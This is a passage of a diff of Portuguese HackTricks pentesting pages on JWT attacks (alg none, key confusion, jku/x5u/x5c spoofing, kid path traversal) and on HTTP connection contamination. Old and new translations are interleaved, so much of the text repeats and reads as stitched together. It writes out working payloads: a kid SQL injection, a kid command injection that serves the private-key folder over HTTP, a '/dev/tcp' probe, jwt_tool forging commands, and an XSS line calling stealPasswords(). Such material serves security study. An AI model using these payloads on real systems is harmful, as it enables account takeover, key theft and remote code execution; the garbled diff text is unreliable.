Para verificar se a assinatura de um JWT está sendo verificada:
- Uma mensagem de erro sugere verificação em andamento; detalhes sensíveis em erros verbosos devem ser revisados.
- Uma mudança na página retornada também indica verificação.
- Nenhuma mudança sugere nenhuma verificação; é nesse momento que se deve experimentar manipular as reivindicações de carga útil.
### Origem
Verifique de onde o token se originou no histórico de solicitações do seu proxy. Ele deve ser criado no servidor, não no cliente.
É importante determinar se o token foi gerado no lado do servidor ou no lado do cliente examinando o histórico de solicitações do proxy.
* Se foi visto pela primeira vez vindo do lado do cliente, então a **chave** é acessível ao código do lado do cliente - procure-a!
* Se foi visto pela primeira vez vindo do servidor, então está tudo bem.
- Tokens vistos pela primeira vez do lado do cliente sugerem que a chave pode estar exposta ao código do lado do cliente, exigindo investigação adicional.
- Tokens originados no lado do servidor indicam um processo seguro.
### Duração
Verifique se o token dura mais de 24h... talvez ele nunca expire. Se houver um campo "exp", verifique se o servidor está lidando corretamente com ele.
Verifique se o token dura mais de 24 horas... talvez ele nunca expire. Se houver um campo "exp", verifique se o servidor está lidando corretamente com ele.
### Força bruta na chave secreta HMAC
### Força bruta no segredo HMAC
[**Veja esta página.**](../generic-methodologies-and-resources/brute-force.md#jwt)
@ -68,84 +70,83 @@ Verifique se o token dura mais de 24h... talvez ele nunca expire. Se houver um c
Defina o algoritmo usado como "None" e remova a parte da assinatura.
Use a extensão Burp chamada "JSON Web Token" para tentar essa vulnerabilidade e para alterar diferentes valores dentro do JWT (envie a solicitação para o Repeater e na aba "JSON Web Token" você pode modificar os valores do token. Você também pode selecionar para colocar o valor do campo "Alg" para "None").
Use a extensão Burp chamada "JSON Web Token" para tentar essa vulnerabilidade e alterar diferentes valores dentro do JWT (envie a solicitação para o Repeater e na guia "JSON Web Token" você pode modificar os valores do token. Você também pode selecionar para colocar o valor do campo "Alg" como "None").
### Mudar o algoritmo RS256 (assimétrico) para HS256 (simétrico) (CVE-2016-5431/CVE-2016-10555)
### Alterar o algoritmo de RS256 (assimétrico) para HS256 (simétrico) (CVE-2016-5431/CVE-2016-10555)
O algoritmo HS256 usa a chave secreta para assinar e verificar cada mensagem.\
O algoritmo RS256 usa a chave privada para assinar a mensagem e usa a chave pública para autenticação.
Se você mudar o algoritmo de RS256 para HS256, o código do back end usa a chave pública como chave secreta e depois usa o algoritmo HS256 para verificar a assinatura.
Se você alterar o algoritmo de RS256 para HS256, o código do back-end usará a chave pública como a chave secreta e então usará o algoritmo HS256 para verificar a assinatura.
Então, usando a chave pública e mudando RS256 para HS256, poderíamos criar uma assinatura válida. Você pode recuperar o certificado do servidor web executando isto:
Em seguida, usando a chave pública e alterando RS256 para HS256, poderíamos criar uma assinatura válida. Você pode recuperar o certificado do servidor da web executando isso:
```bash
openssl s_client -connect example.com:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > certificatechain.pem #For this attack you can use the JOSEPH Burp extension. In the Repeater, select the JWS tab and select the Key confusion attack. Load the PEM, Update the request and send it. (This extension allows you to send the "non" algorithm attack also). It is also recommended to use the tool jwt_tool with the option 2 as the previous Burp Extension does not always works well.
openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
```
### Nova chave pública no cabeçalho
### Nova chave pública dentro do cabeçalho
Um atacante incorpora uma nova chave no cabeçalho do token e o servidor usa essa nova chave para verificar a assinatura (CVE-2018-0114).
Um atacante incorpora uma nova chave no cabeçalho do token e o servidor utiliza essa nova chave para verificar a assinatura (CVE-2018-0114).
Isso pode ser feito com a extensão "JSON Web Tokens" do Burp.\
(Envie a solicitação para o Repeater, na aba JSON Web Token selecione "CVE-2018-0114" e envie a solicitação).
(Envie a solicitação para o Repeater, dentro da guia JSON Web Token selecione "CVE-2018-0114" e envie a solicitação).
### JWKS Spoofing
### Falsificação de JWKS
Se o token usa uma reivindicação de cabeçalho “jku”, então verifique a URL fornecida. Isso deve apontar para uma URL contendo o arquivo JWKS que possui a Chave Pública para verificar o token. Altere o token para apontar o valor de jku para um serviço web que você possa monitorar o tráfego.
As instruções detalham um método para avaliar a segurança de tokens JWT, especialmente aqueles que empregam uma declaração de cabeçalho "jku". Esta declaração deve se vincular a um arquivo JWKS (JSON Web Key Set) que contenha a chave pública necessária para a verificação do token.
Se você receber uma interação HTTP, agora sabe que o servidor está tentando carregar chaves da URL que você está fornecendo. _Use a flag -S do jwt\_tool junto com o argumento -u_ [_http://example.com_](http://example.com) _para gerar um novo par de chaves, injetar sua URL fornecida, gerar um JWKS contendo a Chave Pública e assinar o token com a Chave Privada_
- **Avaliando Tokens com Cabeçalho "jku"**:
- Verifique a URL da declaração "jku" para garantir que ela leve ao arquivo JWKS apropriado.
- Modifique o valor "jku" do token para direcionar para um serviço web controlado, permitindo a observação do tráfego.
### Problemas com "kid"
- **Monitorando a Interação HTTP**:
- Observar as solicitações HTTP para a URL especificada indica as tentativas do servidor de buscar chaves a partir do link fornecido.
- Ao utilizar `jwt_tool` para este processo, é crucial atualizar o arquivo `jwtconf.ini` com a localização do seu JWKS pessoal para facilitar os testes.
`kid` é uma reivindicação de cabeçalho opcional que contém um identificador de chave, particularmente útil quando você tem várias chaves para assinar os tokens e precisa procurar a certa para verificar a assinatura.
- **Comando para `jwt_tool`**:
- Execute o seguinte comando para simular o cenário com `jwt_tool`:
```bash
python3 jwt_tool.py JWT_AQUI -X s
```
#### Problemas com "kid" - revelar chave
### Visão Geral de Problemas com "Kid"
Se a reivindicação "kid" é usada no cabeçalho, verifique o diretório web para esse arquivo ou uma variação dele. Por exemplo, se `"kid":"key/12345"`, então procure por _/key/12345_ e _/key/12345.pem_ na raiz web.
Uma declaração de cabeçalho opcional conhecida como `kid` é utilizada para identificar uma chave específica, o que se torna particularmente vital em ambientes onde múltiplas chaves existem para a verificação da assinatura do token. Esta declaração auxilia na seleção da chave apropriada para verificar a assinatura de um token.
#### Problemas com "kid" - path traversal
#### Revelando Chave através de "kid"
Se a reivindicação "kid" é usada no cabeçalho, verifique se você pode usar um arquivo diferente no sistema de arquivos. Escolha um arquivo cujo conteúdo você possa prever, ou talvez tente `"kid":"/dev/tcp/seuIP/seuPorto"` para testar conectividade, ou até mesmo alguns payloads de **SSRF**...\
_Use a flag -T do jwt\_tool para alterar o JWT e mudar o valor da reivindicação kid, depois escolha manter a assinatura original_
Quando a declaração `kid` está presente no cabeçalho, é aconselhável pesquisar o diretório da web pelo arquivo correspondente ou suas variações. Por exemplo, se `"kid":"chave/12345"` for especificado, os arquivos _/chave/12345_ e _/chave/12345.pem_ devem ser procurados na raiz da web.
#### Traversing de Caminho com "kid"
A declaração `kid` também pode ser explorada para navegar pelo sistema de arquivos, potencialmente permitindo a seleção de um arquivo arbitrário. É viável testar a conectividade ou executar ataques de Solicitação de Servidor-Side Forgery (SSRF) alterando o valor `kid` para direcionar arquivos ou serviços específicos. Manipular o JWT para alterar o valor `kid` mantendo a assinatura original pode ser alcançado usando a bandeira `-T` no jwt_tool, conforme demonstrado abaixo:
```bash
python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
```
Utilizando arquivos dentro do host com conteúdo conhecido, você também pode forjar um JWT válido. Por exemplo, em sistemas Linux o arquivo `/proc/sys/kernel/randomize_va_space` tem o valor definido para **2**. Então, colocando esse **caminho** dentro do parâmetro "**kid**" e usando "**2**" como a **senha simétrica** para gerar o JWT, você deve ser capaz de gerar um novo JWT válido.
Ao direcionar arquivos com conteúdo previsível, é possível forjar um JWT válido. Por exemplo, o arquivo `/proc/sys/kernel/randomize_va_space` em sistemas Linux, conhecido por conter o valor **2**, pode ser usado no parâmetro `kid` com **2** como a senha simétrica para a geração do JWT.
#### Problemas com "kid" - SQL Injection
#### Injeção de SQL via "kid"
Em um cenário onde o conteúdo do "kid" é usado para recuperar a senha do banco de dados, você poderia alterar o payload dentro do parâmetro "kid" para: `non-existent-index' UNION SELECT 'ATTACKER';-- -` e então assinar o JWT com a chave secreta `ATTACKER`.
Se o conteúdo da reivindicação `kid` for utilizado para buscar uma senha de um banco de dados, uma injeção de SQL poderia ser facilitada ao modificar a carga útil do `kid`. Um exemplo de carga útil que usa injeção de SQL para alterar o processo de assinatura do JWT inclui:
#### Problemas com "kid" - OS Injection
`non-existent-index' UNION SELECT 'ATTACKER';-- -`
Em um cenário onde o parâmetro "kid" contém um caminho para o arquivo com a chave e esse caminho está sendo usado **dentro de um comando executado**, você poderia ser capaz de obter RCE e expor a chave privada com um payload como o seguinte: `/root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&`
Essa alteração força o uso de uma chave secreta conhecida, `ATTACKER`, para a assinatura do JWT.
### Ataques Diversos
#### Injeção de SO através do "kid"
As seguintes são fraquezas conhecidas que devem ser testadas.
Um cenário em que o parâmetro `kid` especifica um caminho de arquivo usado em um contexto de execução de comando poderia levar a vulnerabilidades de Execução de Código Remoto (RCE). Ao injetar comandos no parâmetro `kid`, é possível expor chaves privadas. Um exemplo de carga útil para alcançar RCE e exposição de chaves é:
**Ataques de retransmissão entre serviços**
Algumas aplicações web usam um serviço JWT confiável para gerar e gerenciar tokens para eles. No passado, ocorreram alguns casos em que um token gerado para um dos clientes do serviço JWT poderia ser aceito por outro cliente do serviço JWT.\
Se você observar o JWT sendo emitido ou renovado por um serviço terceirizado, vale a pena identificar se você pode se inscrever para uma conta em outro cliente desse serviço com o mesmo nome de usuário/email. Se sim, tente pegar esse token e retransmiti-lo em uma solicitação para o seu alvo. Ele é aceito?
* Se o seu token for aceito, então você pode ter um problema crítico permitindo que você se passe por qualquer conta de usuário. NO ENTANTO, esteja ciente de que, se você está se inscrevendo em um aplicativo de terceiros, pode ser necessário buscar permissão para testes mais amplos em caso de entrar em uma área cinzenta legal!
**O exp é verificado?**
A reivindicação "exp" do Payload é usada para verificar a expiração de um token. Como os JWTs são frequentemente usados na ausência de informações de sessão, eles precisam ser tratados com cuidado - em muitos casos, capturar e retransmitir o JWT de outra pessoa permitirá que você se passe por esse usuário.\
Uma mitigação contra ataques de retransmissão de JWT (que é aconselhada pelo RFC do JWT) é usar a reivindicação "exp" para definir um tempo de expiração para o token. Também é importante definir as verificações relevantes no aplicativo para garantir que esse valor seja processado e o token rejeitado quando estiver expirado. Se o token contém uma reivindicação "exp" e o tempo de teste permitir - tente armazenar o token e retransmiti-lo após o tempo de expiração ter passado. _Use a flag -R do jwt\_tool para ler o conteúdo do token, que inclui análise de carimbo de data/hora e verificação de expiração (carimbo de data/hora em UTC)_
* Se o token ainda validar no aplicativo, então isso pode ser um risco de segurança, pois o token pode NUNCA expirar.
`/root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&`
### x5u e jku
#### jku
jku significa **URL do Conjunto JWK**.\
Se o token usa uma reivindicação de **Cabeçalho** “**jku**”, então **verifique a URL fornecida**. Isso deve apontar para uma URL contendo o arquivo JWKS que possui a Chave Pública para verificar o token. Altere o token para apontar o valor jku para um serviço web que você possa monitorar o tráfego.
jku significa **URL do Conjunto de JWK**.\
Se o token usar uma reivindicação de **Cabeçalho** "**jku**", **verifique a URL fornecida**. Isso deve apontar para uma URL contendo o arquivo JWKS que contém a Chave Pública para verificar o token. Manipule o token para apontar o valor jku para um serviço da web no qual você possa monitorar o tráfego.
Primeiro você precisa criar um novo certificado com novas chaves privadas e públicas
Primeiro, você precisa criar um novo certificado com novas chaves privadas e públicas.
```bash
openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
@ -164,20 +165,20 @@ print("e:", hex(key.e))
```
#### x5u
X.509 URL. Um URI apontando para um conjunto de certificados públicos X.509 (um padrão de formato de certificado) codificados em forma PEM. O primeiro certificado no conjunto deve ser o utilizado para assinar este JWT. Os certificados subsequentes assinam cada um o anterior, completando assim a cadeia de certificados. X.509 é definido no RFC 52807. Segurança de transporte é necessária para transferir os certificados.
X.509 URL. Um URI apontando para um conjunto de certificados públicos X.509 (um padrão de formato de certificado) codificados em forma PEM. O primeiro certificado no conjunto deve ser aquele usado para assinar este JWT. Os certificados subsequentes assinam cada um o anterior, completando assim a cadeia de certificados. X.509 é definido no RFC 5280. A segurança de transporte é necessária para transferir os certificados.
Tente **alterar este cabeçalho para uma URL sob seu controle** e verifique se alguma solicitação é recebida. Nesse caso, você **poderia adulterar o JWT**.
Tente **alterar este cabeçalho para um URL sob seu controle** e verifique se alguma solicitação é recebida. Nesse caso, você **poderia adulterar o JWT**.
Para forjar um novo token usando um certificado controlado por você, você precisa criar o certificado e extrair as chaves pública e privada:
Para forjar um novo token usando um certificado controlado por você, é necessário criar o certificado e extrair as chaves pública e privada:
```bash
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -out attacker.crt
openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
```
Então você pode usar, por exemplo, [**jwt.io**](https://jwt.io) para criar o novo JWT com as **chaves pública e privada criadas e apontando o parâmetro x5u para o certificado .crt criado.**
Então você pode usar, por exemplo, [**jwt.io**](https://jwt.io) para criar o novo JWT com as **chaves pública e privada criadas e apontando o parâmetro x5u para o certificado .crt criado**.
![](<../.gitbook/assets/image (439).png>)
Você também pode abusar dessas duas vulnerabilidades **para SSRFs**.
Você também pode abusar de ambas as vulnerabilidades **para SSRFs**.
#### x5c
@ -185,18 +186,18 @@ Este parâmetro pode conter o **certificado em base64**:
![](<../.gitbook/assets/image (440).png>)
Se o atacante **gerar um certificado autoassinado** e criar um token forjado usando a chave privada correspondente e substituir o valor do parâmetro "x5c" pelo certificado recém-gerado e modificar os outros parâmetros, nomeadamente n, e e x5t, então, essencialmente, o token forjado seria aceito pelo servidor.
Se o atacante **gerar um certificado autoassinado** e criar um token falsificado usando a chave privada correspondente e substituir o valor do parâmetro "x5c" pelo certificado recém-gerado e modificar os outros parâmetros, nomeadamente n, e e x5t, então essencialmente o token falsificado seria aceito pelo servidor.
```bash
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -outattacker.crt
openssl x509 -in attacker.crt -text
```
### Chave Pública Embutida (CVE-2018-0114)
### Chave Pública Incorporada (CVE-2018-0114)
Se o JWT tiver uma chave pública embutida como no seguinte cenário:
Se o JWT tiver incorporada uma chave pública como no seguinte cenário:
![](<../.gitbook/assets/image (438).png>)
Usando o seguinte script nodejs é possível gerar uma chave pública a partir desses dados:
Usando o seguinte script nodejs, é possível gerar uma chave pública a partir desses dados:
```bash
const NodeRSA = require('node-rsa');
const fs = require('fs');
@ -206,7 +207,7 @@ const key = new NodeRSA();
var importedKey = key.importKey({n: Buffer.from(n, 'base64'),e: Buffer.from(e, 'base64'),}, 'components-public');
console.log(importedKey.exportKey("public"));
```
É possível gerar uma nova chave privada/pública, incorporar a nova chave pública dentro do token e usá-la para gerar uma nova assinatura:
É possível gerar um novo par de chaves privada/pública, incorporar a nova chave pública dentro do token e usá-la para gerar uma nova assinatura:
```bash
openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
@ -222,36 +223,50 @@ const publicComponents = key.exportKey('components-public');
console.log('Parameter n: ', publicComponents.n.toString("hex"));
console.log('Parameter e: ', publicComponents.e.toString(16));
```
Finalmente, usando a chave pública e privada e os novos valores de "n" e "e", você pode usar [jwt.io](https://jwt.io) para forjar um novo JWT válido com qualquer informação.
Finalmente, usando a chave pública e privada e os novos valores "n" e "e", você pode usar [jwt.io](https://jwt.io) para forjar um novo JWT válido com qualquer informação.
### JTI (Identificador JWT)
### JTI (JWT ID)
O JTI (Identificador JWT) fornece um identificador único para um Token JWT. Pode ser usado para prevenir a repetição do token.\
No entanto, imagine uma situação onde o comprimento máximo do ID é 4 (0001-9999). A requisição 0001 e 10001 vão usar o mesmo ID. Então, se o backend está incrementando o ID a cada requisição, você poderia abusar disso para **repetir uma requisição** (necessitando enviar 10000 requisições entre cada repetição bem-sucedida).
A reivindicação JTI (JWT ID) fornece um identificador único para um Token JWT. Pode ser usado para evitar que o token seja reproduzido.\
No entanto, imagine uma situação em que o comprimento máximo do ID é 4 (0001-9999). A solicitação 0001 e 10001 vão usar o mesmo ID. Portanto, se o backend estiver incrementando o ID em cada solicitação, você poderia abusar disso para **reproduzir uma solicitação** (sendo necessário enviar 10000 solicitações entre cada reprodução bem-sucedida).
### JWT Registered claims
### Reivindicações Registradas do JWT
{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml#claims" %}
### Outros ataques
**Ataques de Revezamento entre Serviços**
Foi observado que algumas aplicações web dependem de um serviço JWT confiável para a geração e gerenciamento de seus tokens. Foram registradas instâncias em que um token, gerado para um cliente pelo serviço JWT, foi aceito por outro cliente do mesmo serviço JWT. Se a emissão ou renovação de um JWT via um serviço de terceiros for observada, a possibilidade de se inscrever em uma conta em outro cliente desse serviço usando o mesmo nome de usuário/email deve ser investigada. Deve-se então tentar reproduzir o token obtido em uma solicitação ao alvo para ver se é aceito.
- Um problema crítico pode ser indicado pela aceitação do seu token, potencialmente permitindo a falsificação da conta de qualquer usuário. No entanto, deve-se observar que pode ser necessária permissão para testes mais amplos ao se inscrever em um aplicativo de terceiros, pois isso poderia entrar em uma área cinzenta legal.
**Verificação de Expiração de Tokens**
A expiração do token é verificada usando a reivindicação de Payload "exp". Dado que os JWTs são frequentemente empregados sem informações de sessão, é necessária uma manipulação cuidadosa. Em muitas instâncias, capturar e reproduzir o JWT de outro usuário poderia permitir a impersonificação desse usuário. O RFC do JWT recomenda mitigar ataques de reprodução de JWT utilizando a reivindicação "exp" para definir um tempo de expiração para o token. Além disso, a implementação de verificações relevantes pela aplicação para garantir o processamento desse valor e a rejeição de tokens expirados é crucial. Se o token incluir uma reivindicação "exp" e os limites de tempo de teste permitirem, armazenar o token e reproduzi-lo após o tempo de expiração ter passado é aconselhável. O conteúdo do token, incluindo a análise de timestamp e verificação de expiração (timestamp em UTC), pode ser lido usando a flag -R da ferramenta jwt_tool.
- Um risco de segurança pode estar presente se a aplicação ainda validar o token, pois isso pode implicar que o token nunca poderia expirar.
### Ferramentas
{% embed url="https://github.com/ticarpi/jwt_tool" %}
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Dica de bug bounty**: **inscreva-se** no **Intigriti**, uma plataforma premium de bug bounty criada por hackers, para hackers! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje, e comece a ganhar recompensas de até **$100,000**!
**Dica de recompensa por bugs**: **Inscreva-se** no **Intigriti**, uma plataforma de **recompensas por bugs premium criada por hackers, para hackers**! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje e comece a ganhar recompensas de até **$100.000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS de zero a herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

90
pentesting-web/http-connection-contamination.md
View file

@ -1,59 +1,43 @@
# Contaminação de Conexão HTTP
Os navegadores da web usam o [**HTTP connection coalescing**](https://daniel.haxx.se/blog/2016/08/18/http2-connection-coalescing), que permite que eles **reutilizem** uma única **conexão HTTP/2+** para solicitações que vão para **diferentes sites**, desde que os sites **resolvam para o mesmo IP** e usem um certificado TLS válido para ambos os nomes de host.
O **roteamento da primeira solicitação** é um comportamento perigoso de proxy reverso em que o **proxy analisa a primeira solicitação** em uma conexão para descobrir **qual back-end** roteá-la e, em seguida, **envia** todas as **solicitações subsequentes** nessa conexão para o **mesmo back-end**.
**A coalescência de conexão e o roteamento da primeira solicitação não funcionam bem juntos**. Por exemplo, imagine que secure.example.com e wordpress.example.com estão ambos atrás de um proxy reverso usando um certificado válido para \*.example.com:
```shell-session
$ nslookup wordpress.example.com
52.16.179.7 // reverse proxy that supports HTTP/2 and does first-request routing
$ nslookup secure.example.com
52.16.179.7 // same reverse proxy
$ openssl s_client -connect x.portswigger-labs.net:443
subject=/CN=*.example.com // wildcard TLS certificate
```
Se um navegador tentar enviar uma solicitação para **wordpress.example.com** seguido por **secure.example.com**, a coalescência de conexão do navegador forçará **ambas as solicitações em uma única conexão** para o front-end. O roteamento da primeira solicitação resultará na **solicitação para secure.example.com ser incorretamente roteada para o back-end do WordPress**. Isso significa que se você encontrar [XSS](https://portswigger.net/web-security/cross-site-scripting) em wordpress.example.com, você pode usá-lo para comprometer secure.example.com!
```javascript
// create HTTP/2+ connection
fetch('https://wordpress.example.com/', {credentials: 'include'})
// connection coalescing will force this down the same connection...
// ...leading to the front-end misrouting it to WordPress
// the browser thinks our injected JS is coming from secure.example.com
// exposing saved passwords, cookies, etc.
location='https://secure.example.com/plugin/x?q=<script>stealPasswords()'
```
Você pode **explorar a coalescência de conexão por si mesmo** usando o **gráfico de tempo na aba Network nas ferramentas de desenvolvedor do Chrome** (ou usando o WireShark se você é um masoquista). Emita pares de solicitações usando fetch() e veja se o gráfico mostra o tempo gasto na 'Conexão inicial' para a segunda solicitação, e se a coluna ID de conexão corresponde:
{% code overflow="wrap" %}
```javascript
fetch('//sub1.hackxor.net/', {mode: 'no-cors', credentials: 'include'}).then(()=>{ fetch('//sub2.hackxor.net/', {mode: 'no-cors', credentials: 'include'}) })
```
{% endcode %}
<figure><img src="../.gitbook/assets/image (1) (1) (3).png" alt=""><figcaption></figcaption></figure>
Não investi o tempo necessário para explorar essa ameaça em profundidade ou procurá-la na natureza, pois acredito que atualmente é rara por duas razões. Em primeiro lugar, o roteamento de primeira solicitação é relativamente incomum e a complexidade de implementação do HTTP/2 significa que há apenas um pequeno conjunto de servidores HTTP/2 exclusivos em relação ao HTTP/1.1. Em segundo lugar, a coalescência de conexão significa que os servidores HTTP/2 que executam o roteamento de primeira solicitação podem quebrar intermitentemente para visitantes genuínos, então os proprietários podem acabar corrigindo a vulnerabilidade sem incentivo do atacante.
Dito isso, nem tudo são más notícias para os atacantes. O **HTTP/3 propõe** [**remover o requisito de correspondência de endereço IP**](https://www.rfc-editor.org/rfc/rfc9114.html#name-connection-reuse)**, o que exporá todos que possuem um front-end que usa o roteamento de primeira solicitação e tem um certificado válido para vários hosts**.
Isso também cria um segundo risco que não está relacionado ao roteamento de primeira solicitação - significa que um **servidor comprometido com um certificado curinga não requer mais um MITM para ser explorado**. Na prática, isso aumenta muito o número de atores mal-intencionados que podem se beneficiar disso.
Para evitar esses riscos antes que se tornem realidade, certifique-se de que seus proxies reversos não executem o roteamento de primeira solicitação. Você pode testar isso manualmente no Repeater, habilitando o reuso de conexão HTTP/1 e HTTP/2, e também procurar por isso usando o ataque 'Connection-State' em [HTTP Request Smuggler](https://github.com/PortSwigger/http-request-smuggler). Além disso, esteja ciente de que, embora os certificados TLS curinga nunca tenham sido ideais, o HTTP/3 significa que um servidor comprometido com um certificado curinga agora pode ser usado para atacar domínios irmãos sem um MITM ativo.
Essas novas ameaças continuam a tendência contínua de infraestrutura da web se transformando em uma bagunça altamente entrelaçada, onde uma fraqueza em qualquer site individual tem numerosos efeitos colaterais não óbvios na segurança do sistema geral. Será interessante ver como esses riscos se desenrolam na prática.
# Contaminação da Conexão HTTP
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
**Este é um resumo do post: [https://portswigger.net/research/http-3-connection-contamination](https://portswigger.net/research/http-3-connection-contamination)**. Verifique para mais detalhes!
Navegadores da web podem reutilizar uma única conexão HTTP/2+ para diferentes sites por meio da [coalescência de conexão HTTP](https://daniel.haxx.se/blog/2016/08/18/http2-connection-coalescing), desde que compartilhem endereços IP e um certificado TLS comum. No entanto, isso pode entrar em conflito com o **roteamento de primeira solicitação** em proxies reversos, onde solicitações subsequentes são direcionadas ao back-end determinado pela primeira solicitação. Esse encaminhamento incorreto pode levar a vulnerabilidades de segurança, especialmente quando combinado com certificados TLS curinga e domínios como `*.example.com`.
Por exemplo, se `wordpress.example.com` e `secure.example.com` são ambos servidos pelo mesmo proxy reverso e possuem um certificado curinga comum, a coalescência de conexão do navegador pode fazer com que as solicitações para `secure.example.com` sejam processadas incorretamente pelo back-end do WordPress, explorando vulnerabilidades como XSS.
Para observar a coalescência de conexão, a guia de Rede do Chrome ou ferramentas como WireShark podem ser usadas. Aqui está um trecho para teste:
```javascript
fetch('//sub1.hackxor.net/', {mode: 'no-cors', credentials: 'include'}).then(()=>{ fetch('//sub2.hackxor.net/', {mode: 'no-cors', credentials: 'include'}) })
```
A ameaça está atualmente limitada devido à raridade do roteamento do primeiro pedido e à complexidade do HTTP/2. No entanto, as mudanças propostas no HTTP/3, que relaxam o requisito de correspondência de endereço IP, poderiam ampliar a superfície de ataque, tornando os servidores com um certificado curinga mais vulneráveis sem a necessidade de um ataque MITM.
As melhores práticas incluem evitar o roteamento do primeiro pedido em proxies reversos e ter cautela com certificados TLS curinga, especialmente com o advento do HTTP/3. Testes regulares e consciência dessas vulnerabilidades complexas e interconectadas são cruciais para manter a segurança na web.
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
